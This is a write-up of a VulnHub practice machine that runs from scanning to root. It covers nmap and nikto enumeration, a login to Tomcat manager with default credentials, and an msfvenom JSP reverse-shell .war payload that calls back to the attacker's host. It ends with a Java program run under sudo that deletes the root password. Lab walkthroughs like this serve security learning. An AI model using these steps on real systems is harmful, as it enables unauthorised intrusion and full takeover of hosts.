My Tomcat host walkthrough
Hola! Hackers of all sort…This is a quick walkthrough of a vulnhub machine, My tomcat host. You can find this box on the following links:
https://www.infosecwarrior.com/my-tomcat-host/
Its a nice box as it won’t leave you without teaching something new. According to author, the difficulty is easy/beginner level. Okay, enough talking, lets get started…
Methodology applied :
Host discovery
- netdiscover
Enumeration
- nmap
- nikto
Exploit
- msfvenom
Privilege escalation (the fun part 😝 )
- JAVA
Let the hacking begin……
→ Host discovery
─[root@machine]─[~/mine/tomcat]
└──╼ #netdiscover -i vboxnet0
as you can see the machine ip is 192.168.56.37.
Alternatively it could be done by nmap as follows:
┌─[✗]─[root@machine]─[~/mine/tomcat]
└──╼ #nmap -v -p- 192.168.56.1/24→ Enumeration
Use nmap to get open ports.
First use stealth scan to check open ports.
┌─[✗]─[root@machine]─[~/mine/tomcat]
└──╼ #nmap -sS -v -p- 192.168.56.37
We see port 8080 and 22 are open. Now run an aggressive scan on these ports only.
┌─[✗]─[root@machine]─[~/mine/tomcat]
└──╼ #nmap -A -p 8080,22 -v 192.168.56.37
we see that on 8080, http service is running, so lets open it on web.
Its a default tomcat installation page. Since its a thing of web, we can’t ignore nikto results:
┌─[root@machine]─[~/mine/tomcat]
└──╼ #nikto -h http://192.168.56.37:8080/
Out of all the things, the most important to us is that we have credentials for tomcat manager application , tomcat:tomcat. and the directory /manager/html .
We see only .war files can be uploaded.
→ Exploiting
On a little googling about creating backdoors/reverse-shells in .war format, i found a way :
┌─[root@machine]─[~/mine/tomcat]
└──╼ #msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.1 LPORT=1234 -f war > shell.warwhere, LHOST= our IP
LPORT = our listener port
And we have our payload ready, and we are all set to launch the attack. Upload this shell.war file and call it on browser while having the listener on , on our machine, :
And it worked perfectly as we have an unprivileged shell on the target machine. Lets move on to next stage i.e. privilege escalation.
→ Privilege escalation
First, lets convert this dumb shell into interactive shell.
on roaming through directories, nothing interesting came up. So i checked for permissions on sudo command :
bash-4.2$ sudo -l
Matching Defaults entries for tomcat on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/binUser tomcat may run the following commands on this host:
(ALL) NOPASSWD:
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java
we see that we can run java command with sudo privileges.
NOTE: This is the most interesting part of machine. You will find many java programs to execute shell commands, but the actual catch lies in properly compiling and running them. We further have to put the code in a class and in a main method further inside it. Lets see how this is done:
You can find the program from any place, i got it on stack overflow 😅…
program looks like this:
import java.io.BufferedReader;
import java.io.InputStreamReader;public class exploit {
public static void main(String args[]) {
String s;
Process p;
try {
p = Runtime.getRuntime().exec("passwd -d root"); //the command you want to execute
BufferedReader br = new BufferedReader(
new InputStreamReader(p.getInputStream()));
while ((s = br.readLine()) != null)
System.out.println("line: " + s);
p.waitFor();
System.out.println ("exit: " + p.exitValue());
p.destroy();
} catch (Exception e) {}
}
}
NOTE: name of file should be in this format → class_name.java.
we name this program as exploit.java.
→ compile it
bash-4.2$ javac exploit.javaafter this a file exploit.class would be created.
→ run it with sudo
bash-4.2$ sudo java exploit
line: Removing password for user root.
line: passwd: Success
exit: 0
bash-4.2$now su to root, it will give you access without asking for password, as we have executed passwd -d root using sudo privileges. Smart, right? 😎.. i know 😉
and BOOOOMMM!! 🔥🔥🔥🔥…we just owned this box!
Remember, in that program i could run only one command so the most simplest and quickest way i found was to remove root password.
So, that was all from my side. There could be other ways also to root this box. I found this one the simplest one. I am a learner and i always will be a learner 😌. Any amendments in my work would be welcomed and appreciated.
Thank you!
